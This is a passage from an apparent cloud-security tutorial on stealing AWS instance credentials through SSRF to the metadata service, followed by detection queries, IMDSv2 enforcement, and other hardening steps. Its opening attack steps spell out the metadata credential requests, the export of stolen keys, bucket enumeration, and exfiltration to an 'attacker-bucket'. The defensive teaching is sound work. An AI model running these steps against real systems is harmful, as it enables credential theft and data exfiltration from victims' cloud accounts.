# Test if SSRF can reach IMDS:
# Attacker controls a listener (e.g., Burp Collaborator, requestbin)
# then pivots to the metadata endpoint once SSRF is confirmed

Step 2: Exfiltrate credentials via SSRF

# Via the SSRF, the server makes this request:
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# → returns role name in response body

curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/MyApplicationRole
# → returns AccessKeyId, SecretAccessKey, Token JSON

Step 3: Use credentials from attacker’s system

# Export the stolen credentials
export AWS_ACCESS_KEY_ID="ASIAQFAKEKEYIDEXAMPLE"
export AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYFAKESECRETKEY"
export AWS_SESSION_TOKEN="FQoDYXdzEJr...=="

# Confirm identity
aws sts get-caller-identity
# Output shows which account and role — confirms credentials are valid

{
    "UserId": "AROAQFAKEUSERID:i-01234567890abcdef0",
    "Account": "123456789012",
    "Arn": "arn:aws:sts::123456789012:assumed-role/MyApplicationRole/i-01234567890abcdef0"
}

Step 4: Enumerate and exfiltrate

# List all accessible S3 buckets
aws s3 ls
# Output: every bucket in the account (the role needs s3:ListAllMyBuckets for this call)

# List contents of a specific bucket
aws s3 ls s3://target-bucket/ --recursive | head -50

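# Check what IAM actions are allowed (enumerate permissions)
# simulate-principal-policy takes the IAM role ARN, not the assumed-role session ARN,
# and only succeeds if the role itself is allowed iam:SimulatePrincipalPolicy
aws iam simulate-principal-policy \
  --policy-source-arn "arn:aws:iam::123456789012:role/MyApplicationRole" \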
  --action-names "s3:GetObject" "s3:PutObject" "ec2:DescribeInstances" "iam:ListRoles" \
  --query 'EvaluationResults[?EvalDecision==`allowed`].EvalActionName' \
  --output text

# Exfiltrate
aws s3 cp s3://target-bucket/ /tmp/exfil/ --recursive
# Or to attacker-controlled bucket:
aws s3 sync s3://target-bucket/ s3://attacker-bucket/

Simulating It Safely: Test IMDSv1 Enforcement on Your Own Instances

Before running detection controls, confirm which of your instances are still vulnerable:

# Test 1: Can you reach IMDS at all? (run from inside the instance)
curl -s http://169.254.169.254/latest/meta-data/ --max-time 2
# If this returns a list of metadata fields, IMDS is reachable without a token
# An HTTP 401 (visible with curl -i) means IMDS is reachable but enforcing tokens

# Test 2: Is IMDSv1 still enabled? (no token required)
curl -s http://169.254.169.254/latest/meta-data/instance-id --max-time 2
# If this returns an instance ID without supplying a token → IMDSv1 is enabled
# Example output: i-01234567890abcdef0

# Test 3: Check the enforcement state via AWS CLI (from outside the instance)
aws ec2 describe-instances \
  --instance-ids i-01234567890abcdef0 \
  --query 'Reservations[].Instances[].MetadataOptions'

[
    {
        "State": "applied",
        "HttpTokens": "optional",           ← "optional" means IMDSv1 is still enabled
        "HttpPutResponseHopLimit": 1,
        "HttpEndpoint": "enabled",
        "HttpProtocolIpv6": "disabled",
        "InstanceMetadataTags": "disabled"
    }
]

"HttpTokens": "optional" means IMDSv1 is still active. Any SSRF in the instance’s software stack can reach these credentials without a token.

# Audit all instances in a region for IMDSv1 exposure
aws ec2 describe-instances \
  --query 'Reservations[].Instances[].{
    InstanceId: InstanceId,
    Name: Tags[?Key==`Name`].Value | [0],
    HttpTokens: MetadataOptions.HttpTokens,
    HopLimit: MetadataOptions.HttpPutResponseHopLimit
  }' \
  --output table | \
  grep -E "optional|InstanceId"
# Any row showing "optional" is IMDSv1-exposed
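
The same audit can be expressed as a filter over the DescribeInstances response, which is easier to wire into a scheduled job than a grep over table output. A minimal sketch, assuming the response has already been fetched (for example with boto3's `describe_instances`); the `imdsv1_exposed` helper and the sample data are hypothetical.

```python
def imdsv1_exposed(describe_instances_response: dict) -> list:
    """Return instances whose metadata options do not require IMDSv2 tokens."""
    exposed = []
    for reservation in describe_instances_response.get("Reservations", []):
        for instance in reservation.get("Instances", []):
            options = instance.get("MetadataOptions", {})
            # Anything other than "required" leaves token-less IMDSv1 requests possible.
            if options.get("HttpTokens") != "required":
                name = next(
                    (tag["Value"] for tag in instance.get("Tags", []) if tag["Key"] == "Name"),
                    None,
                )
                exposed.append(
                    {
                        "InstanceId": instance["InstanceId"],
                        "Name": name,
                        "HopLimit": options.get("HttpPutResponseHopLimit"),
                    }
                )
    return exposed


# Hand-written sample in the shape of a DescribeInstances response.
sample = {
    "Reservations": [
        {
            "Instances": [
                {
                    "InstanceId": "i-0aaaaaaaaaaaaaaaa",
                    "Tags": [{"Key": "Name", "Value": "legacy-api"}],
                    "MetadataOptions": {"HttpTokens": "optional", "HttpPutResponseHopLimit": 1},
                },
                {
                    "InstanceId": "i-0bbbbbbbbbbbbbbbb",
                    "MetadataOptions": {"HttpTokens": "required", "HttpPutResponseHopLimit": 1},
                },
            ]
        }
    ]
}

for row in imdsv1_exposed(sample):
    print(row)
```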

Blue Phase: Detection

What CloudTrail Logs When IMDS Credentials Are Abused

The IMDS credential theft itself is silent — there is no CloudTrail event for an IMDS GET request. The attacker’s use of the stolen credentials is what generates logs. The key signal is GetCallerIdentity from an unusual source IP paired with the instance role’s ARN appearing in CloudTrail from an IP that is not the instance itself.

# Find API calls made using instance role credentials from external IPs
# Instance roles appear in CloudTrail as assumed-role ARNs
DETECTOR_ROLE="MyApplicationRole"
# The address CloudTrail records for your instance: its public or NAT egress IP,
# or the private IP when calls go through a VPC endpoint
INSTANCE_IP="10.0.1.50"

# Each CloudTrailEvent is a JSON-encoded string, so request JSON output
# and decode every element with fromjson
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=GetCallerIdentity \
  --start-time "$(date -d '7 days ago' --iso-8601=seconds)" \
  --query 'Events[].CloudTrailEvent' \
  --output json | \
  jq --arg role "${DETECTOR_ROLE}" '.[] | fromjson |
    select(.userIdentity.sessionContext.sessionIssuer.userName == $role) |
    {
      time: .eventTime,
      event: .eventName,
      sourceIP: .sourceIPAddress,
      userAgent: .userAgent,
      region: .awsRegion,
      roleArn: .userIdentity.arn
    }' | \
  jq --arg ip "${INSTANCE_IP}" 'select(.sourceIP != $ip)'
  # Any result here = role credentials being used from outside the instance

The tell: the userIdentity.arn will contain the instance ID as the role session name (e.g., assumed-role/MyApplicationRole/i-01234567890abcdef0). If that ARN is making API calls from an IP address that is not the EC2 instance, someone has stolen the credentials and is using them externally.
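
That rule can be sketched as a small function over decoded CloudTrail records. This is an illustration under stated assumptions: `stolen_credential_events` and the `expected_ips` mapping (instance ID to the addresses CloudTrail normally records for it) are hypothetical, and the sample records are hand-written.

```python
import re

# Instance role sessions are named after the instance ID, e.g. .../MyApplicationRole/i-0abc...
INSTANCE_SESSION = re.compile(r":assumed-role/(?P<role>[^/]+)/(?P<instance>i-[0-9a-f]+)$")


def stolen_credential_events(records: list, expected_ips: dict) -> list:
    """Flag records where an instance-role session calls AWS from an unexpected IP."""
    hits = []
    for record in records:
        arn = record.get("userIdentity", {}).get("arn", "")
        match = INSTANCE_SESSION.search(arn)
        if match is None:
            continue  # not an EC2 instance-role session
        source = record.get("sourceIPAddress")
        if source not in expected_ips.get(match["instance"], set()):
            hits.append(
                {
                    "time": record.get("eventTime"),
                    "event": record.get("eventName"),
                    "instance": match["instance"],
                    "role": match["role"],
                    "sourceIP": source,
                }
            )
    return hits


ARN = "arn:aws:sts::123456789012:assumed-role/MyApplicationRole/i-01234567890abcdef"
records = [
    {"eventTime": "t1", "eventName": "GetCallerIdentity", "sourceIPAddress": "10.0.1.50",
     "userIdentity": {"arn": ARN}},
    {"eventTime": "t2", "eventName": "ListBuckets", "sourceIPAddress": "198.51.100.7",
     "userIdentity": {"arn": ARN}},
    {"eventTime": "t3", "eventName": "ListBuckets", "sourceIPAddress": "198.51.100.7",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/alice"}},
]

for hit in stolen_credential_events(records, {"i-01234567890abcdef": {"10.0.1.50"}}):
    print(hit)
```

In real trails, sourceIPAddress can also hold an AWS service name when a service calls on the role's behalf, so the expected set usually needs those entries as well.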

GuardDuty: The Purpose-Built Finding

GuardDuty has a specific finding for exactly this scenario:

UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS

This finding fires when GuardDuty detects that temporary credentials associated with an EC2 instance role are being used from an IP address outside of AWS entirely, meaning someone has exfiltrated the credentials to their own system and is using them from there.

# Retrieve this specific finding type from GuardDuty
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

aws guardduty list-findings \
  --detector-id "${DETECTOR_ID}" \
  --finding-criteria '{
    "Criterion": {
      "type": {
        "Equals": [
          "UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS",
          "UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.InsideAWS"
        ]
      }
    }
  }' \
  --query 'FindingIds' --output text | \
  xargs -n 10 aws guardduty get-findings \
    --detector-id "${DETECTOR_ID}" \
    --finding-ids | \
  jq '.Findings[] | {
    type: .Type,
    severity: .Severity,
    instance: .Resource.InstanceDetails.InstanceId,
    role: .Resource.AccessKeyDetails.UserName,
    externalIP: .Service.Action.AwsApiCallAction.RemoteIpDetails.IpAddressV4,
    firstSeen: .Service.EventFirstSeen,
    lastSeen: .Service.EventLastSeen
  }'

A second finding to watch:

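Recon:IAMUser/UserPermissions fires when the stolen credentials are used to enumerate IAM permissions (the iam:SimulatePrincipalPolicy call from the attacker's Step 4 above). It often appears immediately before the data exfiltration events. AWS lists this finding type as retired in newer GuardDuty releases, where similar behavior surfaces as Discovery:IAMUser/AnomalousBehavior, so check which type your detector emits.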

VPC Flow Logs: Connections to 169.254.169.254

VPC Flow Logs are a weak signal for IMDS access itself: AWS documents traffic to and from 169.254.169.254 as excluded from flow logs, so expect the query below to return no rows in a standard setup. Flow logs remain useful for the instance egress that follows credential theft. Rows that do appear for the IMDS address deserve a closer look, starting with the source IP:

# Athena query against VPC flow logs
# Find: connections to 169.254.169.254 from unexpected source IPs
# (useful in containerized environments where only the instance itself should call IMDS)

SELECT
  srcaddr,
  dstaddr,
  srcport,
  dstport,
  protocol,
  packets,
  bytes,
  action,
  log_status,
  from_unixtime(start) as start_time
FROM vpc_flow_logs
WHERE
  dstaddr = '169.254.169.254'
  AND action = 'ACCEPT'
  AND from_unixtime(start) > current_timestamp - interval '24' hour
ORDER BY start_time DESC;

An empty result does not prove that containers cannot reach IMDS, because flow logs are not a reliable record of metadata traffic. If you do see source IPs in this query that are not your EC2 instance's primary private IP (for example, container IPs within the pod CIDR) and you have --http-put-response-hop-limit 1 set, those requests should be failing. If they're succeeding, the hop limit is not enforced.

IMDSv2 Hop Limit: Why It Blocks Containerized Attacks

The hop limit is a separate defense from the token requirement. With --http-put-response-hop-limit 1, the response to the PUT request that issues an IMDSv2 token is sent with an IP TTL of 1. When a process running inside a container requests a token, that response has to travel back across:

Hypervisor IMDS endpoint → host network namespace → veth pair → container network namespace

Forwarding the response from the host namespace into the container decrements the TTL to 0, so the response is dropped and the container never receives a token. Any GET that follows has no token and, if --http-tokens required is also set, is rejected. Pods that run with hostNetwork: true share the host namespace and are not stopped by the hop limit.

Hop limit = 1:
  IMDS → host → [TTL=0, token response dropped before the veth]
  The container never receives a token

Hop limit = 2 (required for EKS with IMDS access):
  IMDS → host → veth → container
  Token is delivered; GET with token succeeds
  ← Use this only when container workloads legitimately need IMDS
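
The TTL arithmetic can be checked with a toy model: the packet carrying the token starts with a TTL equal to the hop limit and loses one at every forwarding hop. The `token_delivered` function and the hop counts below are illustrative assumptions, not measurements of any particular CNI.

```python
def token_delivered(hop_limit: int, forwarding_hops: int) -> bool:
    """Return True if a packet with TTL=hop_limit survives the given number of forwards."""
    ttl = hop_limit
    for _ in range(forwarding_hops):
        ttl -= 1  # each forwarding step decrements the TTL
        if ttl <= 0:
            return False  # dropped instead of being forwarded
    return True


# 0 forwards: process in the host network namespace (or a hostNetwork pod)
# 1 forward:  container behind a veth pair or bridge
scenarios = {"host process": 0, "bridged container": 1}

for hop_limit in (1, 2):
    for name, hops in scenarios.items():
        outcome = "token delivered" if token_delivered(hop_limit, hops) else "dropped"
        print(f"hop limit {hop_limit}, {name}: {outcome}")
```

The model also shows why raising the limit is a trade-off: every extra hop allowed for a legitimate workload is a hop allowed for anything else running at that network depth.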

For EKS specifically: use hop limit 2 only on nodes where pods have a legitimate need to call IMDS (rare). The preferred approach is pod-level identity via OIDC workload identity: pods get short-lived tokens scoped to their service account, not the node's IAM role.

Purple Phase: Structural Fixes

Fix 1: Enforce IMDSv2 — The Non-Negotiable Control

This is not optional. Every EC2 instance running production workloads should have --http-tokens required. The operational cost is near zero, and it closes the SSRF-to-IMDS credential chain for any SSRF that cannot send a PUT request and custom headers, which covers the common GET-only case.

# Enforce IMDSv2 on a running instance
aws ec2 modify-instance-metadata-options \
  --instance-id i-1234567890abcdef0 \
  --http-tokens required \
  --http-put-response-hop-limit 1

# Verify the change took effect
aws ec2 describe-instances \
  --instance-ids i-1234567890abcdef0 \
  --query 'Reservations[].Instances[].MetadataOptions'
# "HttpTokens": "required" confirms IMDSv2 is enforced

# Enforce IMDSv2 in a launch template (all new instances launched from this template)
aws ec2 create-launch-template-version \
  --launch-template-id lt-0abcdef1234567890 \
  --source-version '$Latest' \
  --launch-template-data '{
    "MetadataOptions": {
      "HttpTokens": "required",
      "HttpPutResponseHopLimit": 1,
      "HttpEndpoint": "enabled"
    }
  }'

# Set this new version as the default
aws ec2 modify-launch-template \
  --launch-template-id lt-0abcdef1234567890 \
  --default-version '$Latest'

# Bulk remediation: enforce IMDSv2 on all instances in a region where
# HttpTokens is currently "optional"
# (check the EKS hop-limit gotcha below before running this against cluster nodes)
aws ec2 describe-instances \
  --query 'Reservations[].Instances[?MetadataOptions.HttpTokens==`optional`][].InstanceId' \
  --output text | \
  tr '\t' '\n' | \
  while read -r instance_id; do
    [ -n "$instance_id" ] || continue   # skip blank lines when nothing matches
    echo "Enforcing IMDSv2 on: $instance_id"
    aws ec2 modify-instance-metadata-options \
      --instance-id "$instance_id" \
      --http-tokens required \
      --http-put-response-hop-limit 1
  done
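
What enforcement changes for a client can be sketched with the standard library: a token must be requested with PUT, then presented in a header on every metadata GET. The header names are the ones AWS documents for IMDSv2; the helper functions are illustrative, and `fetch_instance_id` only works when run on an EC2 instance.

```python
import urllib.request

IMDS = "http://169.254.169.254"


def token_request(ttl_seconds: int = 21600) -> urllib.request.Request:
    """Step 1: PUT to the token endpoint, asking for a session token with the given TTL."""
    return urllib.request.Request(
        f"{IMDS}/latest/api/token",
        method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": str(ttl_seconds)},
    )


def metadata_request(path: str, token: str) -> urllib.request.Request:
    """Step 2: GET a metadata path, presenting the session token in a header."""
    return urllib.request.Request(
        f"{IMDS}/latest/meta-data/{path}",
        headers={"X-aws-ec2-metadata-token": token},
    )


def fetch_instance_id(timeout: float = 2.0) -> str:
    """Run both steps against the real endpoint (EC2 only; not called here)."""
    with urllib.request.urlopen(token_request(60), timeout=timeout) as response:
        token = response.read().decode()
    with urllib.request.urlopen(metadata_request("instance-id", token), timeout=timeout) as response:
        return response.read().decode()


step1 = token_request(60)
step2 = metadata_request("instance-id", "example-token")
print(step1.get_method(), step1.full_url)
print(step2.get_method(), step2.full_url)
```

An SSRF that only lets the attacker choose a URL for a server-side GET can produce neither the PUT in step 1 nor the custom header in step 2, which is why the enforcement above breaks the chain.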

Fix 2: SCP to Block IMDSv1 Org-Wide

An SCP prevents any account in your organization from launching instances with IMDSv1 enabled, and blocks modification of existing instances to re-enable it. This is the org-level control that makes IMDSv2 enforcement durable — individual account teams can’t accidentally revert it.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "RequireIMDSv2OnNewInstances",
      "Effect": "Deny",
      "Action": "ec2:RunInstances",
      "Resource": "arn:aws:ec2:*:*:instance/*",
      "Condition": {
        "StringNotEquals": {
          "ec2:MetadataHttpTokens": "required"
        }
      }
    },
    {
      "Sid": "DenyIMDSv1ReEnablement",
      "Effect": "Deny",
      "Action": "ec2:ModifyInstanceMetadataOptions",
      "Resource": "*",
      "Condition": {
        "StringEquals": {
          "ec2:MetadataHttpTokens": "optional"
        }
      }
    }
  ]
}

Attach this SCP at the organization root or to each OU. SCPs never apply to the management account itself, so enforce IMDSv2 there by other means. New ec2:RunInstances calls that don't include MetadataOptions.HttpTokens=required will be denied. Existing instances can be remediated with the bulk script above; once remediated, the second statement prevents reverting.
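
The intent of the two statements can be written down as a pair of predicates. This is a toy model of the condition logic only, not IAM's policy evaluation engine; the function names and the shape of `request_context` are assumptions, so validate the real policy in a sandbox OU before rolling it out.

```python
def run_instances_denied(request_context: dict) -> bool:
    """Statement 1: deny ec2:RunInstances unless HttpTokens is 'required'."""
    # StringNotEquals is a negated operator, so a request that omits the key
    # is modeled as a match and denied as well.
    return request_context.get("ec2:MetadataHttpTokens") != "required"


def modify_metadata_denied(request_context: dict) -> bool:
    """Statement 2: deny ec2:ModifyInstanceMetadataOptions when the value is 'optional'."""
    return request_context.get("ec2:MetadataHttpTokens") == "optional"


launches = [
    {"ec2:MetadataHttpTokens": "required"},
    {"ec2:MetadataHttpTokens": "optional"},
    {},  # launch request that never mentions HttpTokens
]

for context in launches:
    verdict = "DENY" if run_instances_denied(context) else "allow"
    print(f"RunInstances {context}: {verdict}")

print("Revert to optional:", "DENY" if modify_metadata_denied({"ec2:MetadataHttpTokens": "optional"}) else "allow")
```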

Fix 3: OIDC Workload Identity — Eliminate the Credential Entirely

Enforcing IMDSv2 removes the SSRF-to-IMDS path. OIDC workload identity goes further and takes the application's credential out of IMDS altogether: the permissions live on a role bound to the workload rather than on the instance profile, so there is nothing useful for SSRF to retrieve from the metadata endpoint.

For Kubernetes workloads on EKS: use IAM Roles for Service Accounts (IRSA) or EKS Pod Identity. The pod’s service account is bound to an IAM role via OIDC. The pod gets short-lived, automatically rotated credentials scoped to that specific role. The node’s instance profile requires no IAM permissions for application workloads.

# EKS Pod Identity: associate a service account with an IAM role
aws eks create-pod-identity-association \
  --cluster-name my-cluster \
  --namespace my-app \
  --service-account my-app-sa \
  --role-arn arn:aws:iam::123456789012:role/my-app-role

# The pod receives credentials via a projected volume token, not IMDS
# Even if an attacker gets SSRF inside the pod, IMDS has no useful credentials for them
# The most they get: instance metadata (instance ID, AMI, AZ) — not IAM credentials

Fix 4: Restrict SSRF at the Network and Application Layer

IMDSv2 enforcement is the primary control. Defense in depth adds:

# WAF rule (AWS WAF): block requests where the URL contains the IMDS address
# This catches simple SSRF attempts at the perimeter before they reach your app
# Deploy as a managed rule group or custom rule:

# AWS CLI: create a WAF rule to block IMDS-targeting SSRFs
aws wafv2 create-rule-group \
  --name "BlockSSRFToIMDS" \
  --scope REGIONAL \
  --capacity 10 \
  --rules '[
    {
      "Name": "BlockIMDSAccess",
      "Priority": 0,
      "Statement": {
        "ByteMatchStatement": {
          "SearchString": "169.254.169.254",
          "FieldToMatch": {"QueryString": {}},
          "TextTransformations": [{"Priority": 0, "Type": "NONE"}],
          "PositionalConstraint": "CONTAINS"
        }
      },
      "Action": {"Block": {}},
      "VisibilityConfig": {
        "SampledRequestsEnabled": true,
        "CloudWatchMetricsEnabled": true,
        "MetricName": "BlockIMDSAccess"
      }
    }
  ]' \
  --visibility-config SampledRequestsEnabled=true,CloudWatchMetricsEnabled=true,MetricName=BlockSSRFToIMDS

# Egress filtering: block EC2 instances from making outbound requests
# to the IMDS address from application code (defense in depth via iptables)
# This only applies if your application runs as a non-root user
# Root processes bypass this — it is a secondary control, not primary

# On the EC2 instance, block application user (uid 1001) from reaching IMDS
iptables -A OUTPUT \
  -m owner --uid-owner 1001 \
  -d 169.254.169.254 \
  -j REJECT \
  --reject-with icmp-port-unreachable

# Only the instance's AWS SDK calls (typically running as a system service with different uid)
# should need IMDS access — scope accordingly

Note: iptables-based egress filtering is a secondary control. A root process, or any process with CAP_NET_ADMIN, can bypass or modify these rules. The primary control remains IMDSv2 enforcement.
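
At the application layer, the equivalent control is to validate where a user-supplied URL actually points before the server fetches it. A minimal sketch, assuming a hypothetical `is_safe_destination` helper with an injectable resolver so it can be exercised without DNS; it rejects any destination that resolves to a non-global address, which includes 169.254.169.254.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


def resolve_all(host: str) -> set:
    """Resolve a hostname to every address it maps to (default resolver)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_safe_destination(url: str, resolver=resolve_all) -> bool:
    """Allow only http(s) URLs whose host resolves exclusively to global addresses."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    try:
        addresses = resolver(parts.hostname)
    except OSError:
        return False  # unresolvable hosts are rejected
    if not addresses:
        return False
    for address in addresses:
        try:
            ip = ipaddress.ip_address(address)
        except ValueError:
            return False
        # Link-local (IMDS), private, loopback and reserved ranges are all non-global.
        if not ip.is_global:
            return False
    return True


# Stub resolvers stand in for DNS so the checks are deterministic.
print(is_safe_destination("http://avatar.example/me.png", resolver=lambda h: {"169.254.169.254"}))
print(is_safe_destination("https://cdn.example/me.png", resolver=lambda h: {"93.184.216.34"}))
```

A check like this is subject to DNS rebinding if the fetch resolves the name again afterwards, so the fetch should connect to the address that was validated. Like the iptables rule, it is a secondary control behind IMDSv2 enforcement.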

⚠ Production Gotchas

Legacy AWS SDK versions that only support IMDSv1. SDK releases that predate IMDSv2 cannot request session tokens; AWS's IMDSv2 transition guide lists AWS SDK for Java 1.11.678 and boto3 1.12.6 (botocore 1.13.25) as the minimum versions. Enforcing --http-tokens required on an instance running an older SDK will break credential refresh for the running application. Before enforcing IMDSv2 on a running instance, verify the SDK version used by all processes that call IMDS. Upgrade the SDK if needed; then enforce IMDSv2. The AWS Config rule ec2-imdsv2-check flags non-compliant instances but does not check SDK versions, so that inventory step is manual.

# Check boto3 version on an instance
python3 -c "import boto3; print(boto3.__version__)"
# Compare against the minimum in AWS's IMDSv2 transition guide (boto3 1.12.6)

# Check AWS SDK for Java via jar manifest (if applicable)
find /opt /app -name "aws-java-sdk-core-*.jar" 2>/dev/null | \
  while read jar; do
    unzip -p "$jar" META-INF/MANIFEST.MF 2>/dev/null | grep "Implementation-Version"
  done
# AWS SDK for Java v1 < 1.11.678 does not support IMDSv2 by default
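
When scripting that inventory, compare versions numerically rather than as strings, since "1.9" sorts after "1.11" in a text comparison. A small sketch, assuming purely numeric dotted versions; `meets_minimum` is a hypothetical helper and the minimum is passed in rather than hard-coded.

```python
def parse_version(text: str) -> tuple:
    """Turn '1.11.678' into (1, 11, 678) so comparison is numeric, not lexical."""
    return tuple(int(part) for part in text.strip().split("."))


def meets_minimum(installed: str, minimum: str) -> bool:
    """Return True if the installed version is at least the required minimum."""
    return parse_version(installed) >= parse_version(minimum)


JAVA_V1_MINIMUM = "1.11.678"  # threshold quoted above for AWS SDK for Java v1

for found in ("1.11.700", "1.11.677", "1.9.999", "1.12.1"):
    status = "ok" if meets_minimum(found, JAVA_V1_MINIMUM) else "upgrade before enforcing IMDSv2"
    print(f"aws-java-sdk-core {found}: {status}")
```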

EKS node groups and hop limit 2. If you run EKS and pods use IRSA (IAM Roles for Service Accounts), the pods themselves do not use IMDS; they use a projected service account token. You should be safe with hop limit 1 on EKS nodes in most cases. However, if you have DaemonSets or system components that fetch instance metadata directly from inside the pod network (some cluster autoscaler versions, node monitoring agents), hop limit 1 will break them. Audit which processes on your nodes actually call IMDS before setting hop limit 1 on EKS. EKS managed node groups (created with aws eks create-nodegroup) default to hop limit 2 for this reason; you can reduce it once you've confirmed nothing breaks.

GuardDuty’s 5–15 minute detection delay. UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration is not a real-time control. GuardDuty aggregates events and applies ML-based anomaly detection — the finding typically appears 5 to 15 minutes after the first anomalous API call. A credential with broad S3 permissions can exfiltrate a significant volume of data in that window. GuardDuty detects the breach; it does not prevent the initial exfiltration. Pair it with: IAM permission boundaries that scope the blast radius, and S3 data events in CloudTrail with real-time EventBridge rules for high-sensitivity buckets.

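# EventBridge rule: match S3 GetObject data events made with the application role's credentials
# (complements GuardDuty's delayed finding; attach a target with `aws events put-targets`
# to get alerted, and narrow the pattern to the buckets or source IPs you consider unexpected)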
aws events put-rule \
  --name "S3DataEventFromUnexpectedSource" \
  --event-pattern '{
    "source": ["aws.s3"],
    "detail-type": ["AWS API Call via CloudTrail"],
    "detail": {
      "eventSource": ["s3.amazonaws.com"],
      "eventName": ["GetObject"],
      "userIdentity": {
        "sessionContext": {
          "sessionIssuer": {
            "userName": ["MyApplicationRole"]
          }
        }
      }
    }
  }' \
  --state ENABLED

Disabling the IMDS endpoint entirely. You can set --http-endpoint disabled to turn off IMDS access altogether. Do this only on instances where you are certain no running process needs instance metadata. ECS and EKS managed nodes need IMDS for node registration and credential delivery to the container agent. Application-only EC2 instances that use OIDC/IRSA and have no SDK calls to IMDS are candidates for full endpoint disablement.
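Before changing any of the settings above, it helps to know what each instance currently allows. The following is a minimal sketch, assuming the AWS CLI is configured for the target account and region; `imds_options` and `flag_imdsv1` are hypothetical helper names, and the query reads the `MetadataOptions` fields returned by `describe-instances`.

```shell
# imds_options: one tab-separated row per instance:
#   instance-id  HttpTokens  HttpPutResponseHopLimit  HttpEndpoint
imds_options() {
  aws ec2 describe-instances \
    --query 'Reservations[].Instances[].[InstanceId,MetadataOptions.HttpTokens,MetadataOptions.HttpPutResponseHopLimit,MetadataOptions.HttpEndpoint]' \
    --output text
}

# flag_imdsv1: read those rows on stdin and print instances whose metadata
# endpoint is enabled but does not require a session token (IMDSv1 allowed).
flag_imdsv1() {
  awk -F '\t' '$4 == "enabled" && $2 != "required" {
    print $1 ": IMDSv1 still allowed (hop limit " $3 ")"
  }'
}

# Usage (needs AWS credentials):
#   imds_options | flag_imdsv1
```

The output is only an inventory of instance settings. It does not tell you which processes call IMDS, so the SDK and DaemonSet audits described above still apply.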

Quick Reference

IMDSv1 vs IMDSv2

Attribute	IMDSv1	IMDSv2
Authentication	None — any HTTP GET works	PUT to `/latest/api/token` required first to obtain a session token
SSRF exploitable	Yes — one HTTP request returns credentials	No — SSRF cannot initiate a PUT before a GET in standard flows
Session token TTL	N/A	1 second to 21,600 seconds (configurable)
Hop limit enforcement	N/A	Enforced on PUT — TTL=1 blocks containers from reaching IMDS
AWS CLI enforcement	`--http-tokens optional` (default on old instances)	`--http-tokens required`
Capital One risk	Present	Eliminated

IMDSv2 Enforcement Commands by Provider

Provider	Enforcement Command	Scope
AWS — running instance	`aws ec2 modify-instance-metadata-options --instance-id i-xxx --http-tokens required --http-put-response-hop-limit 1`	Single instance
AWS — launch template	Add `"MetadataOptions": {"HttpTokens": "required"}` to launch template data	All instances from template
AWS — org SCP	Deny `ec2:RunInstances` where `ec2:MetadataHttpTokens != required`	All accounts in org
AWS — Config rule	`ec2-imdsv2-check` managed rule	Compliance audit
GCP	GCP does not have an unauthenticated IMDS equivalent; Metadata Server requires `Metadata-Flavor: Google` header — this header cannot be set via SSRF in most frameworks	N/A
Azure	Azure IMDS requires `Metadata: true` header — browser/SSRF requests typically cannot set this; additionally, IMDS returns only non-credential metadata by default (credentials via Managed Identity have their own endpoint with additional controls)	N/A

Note on GCP and Azure: Both providers designed their metadata services with SSRF resistance in mind. The Metadata-Flavor: Google and Metadata: true headers must be explicitly set by the calling code — they are not added by default browser or curl requests. This does not make SSRF harmless on GCP/Azure (other metadata is still exposed), but the credential exfiltration path is harder than IMDSv1.

Key Takeaways

IMDSv1 has no authentication: any SSRF in any process running on an EC2 instance — application code, WAF, sidecar, proxy — is sufficient to retrieve the full IAM role credentials; no privilege escalation required
The Capital One breach was not a novel attack: it was a well-known SSRF-to-IMDS chain that had been documented for years before 2019; the industry was slow to enforce IMDSv2 at scale
--http-tokens required is the complete fix for the SSRF-to-IMDS credential chain; the operational cost is near zero; every production EC2 instance should have it; use an SCP to make it org-wide and durable
GuardDuty’s UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration finding is your primary post-exploitation signal but fires 5–15 minutes after the fact — pair it with IAM permission boundaries to limit blast radius and EventBridge rules on S3 data events for real-time alerting
The structural solution eliminates the credential entirely: OIDC workload identity on EKS/GKE means pods get scoped, short-lived tokens; the node’s instance role carries no application permissions; even a successful SSRF-to-IMDS attack yields nothing useful

What’s Next

SSRF gets you IAM credentials. But if the attacker is already inside a container — even a legitimate one — the path to the host is different. The credential-theft chain doesn’t apply when the attacker already has code execution inside a pod. EP08 covers Kubernetes container escape: hostPID, hostNetwork, privileged containers, and the kernel-level paths that take an attacker from container to node. The detection angle is where eBPF enters the picture — syscall-level visibility that catches escape attempts before they complete.


CI/CD Secrets Exposure: How Supply Chain Attacks Target Your Pipeline

June 16, 2026 by Vamshi Krishna Santhapuri

Reading Time: 11 minutes


TL;DR

CI/CD secrets exposure is OWASP A08 + A02: credentials committed to repositories or stored in pipeline environment variables can be exfiltrated when the platform is compromised, and automated scanners find them within seconds of a public commit
The CircleCI breach (January 2023): an engineer’s laptop was compromised via malware → session token stolen → attacker accessed CircleCI production systems → all customer environment variables (AWS keys, GitHub tokens, SSH keys) exfiltrated
The structural problem: long-lived credentials stored in a CI/CD platform are only as secure as the platform itself — if the platform is compromised, all stored secrets are compromised
The structural fix: OIDC workload identity replaces stored credentials with short-lived tokens issued at job runtime — there is nothing to exfiltrate
Pre-commit hooks and CI-layer secret scanning are detection layers, not structural fixes — they catch accidents, not determined attackers
Automated secret scanners (TruffleHog, Gitleaks) find credentials in public repos within 60–90 seconds of commit

OWASP Mapping: A08 Software and Data Integrity Failures — build pipeline integrity. A02 Cryptographic Failures — secrets stored in ways that allow exfiltration.

The Big Picture

┌─────────────────────────────────────────────────────────────────────┐
│                  CI/CD SECRETS ATTACK SURFACE                       │
│                                                                     │
│   VECTOR 1: COMMITTED TO VCS                                        │
│   Developer ── git commit ──▶ .env with AWS_SECRET_KEY              │
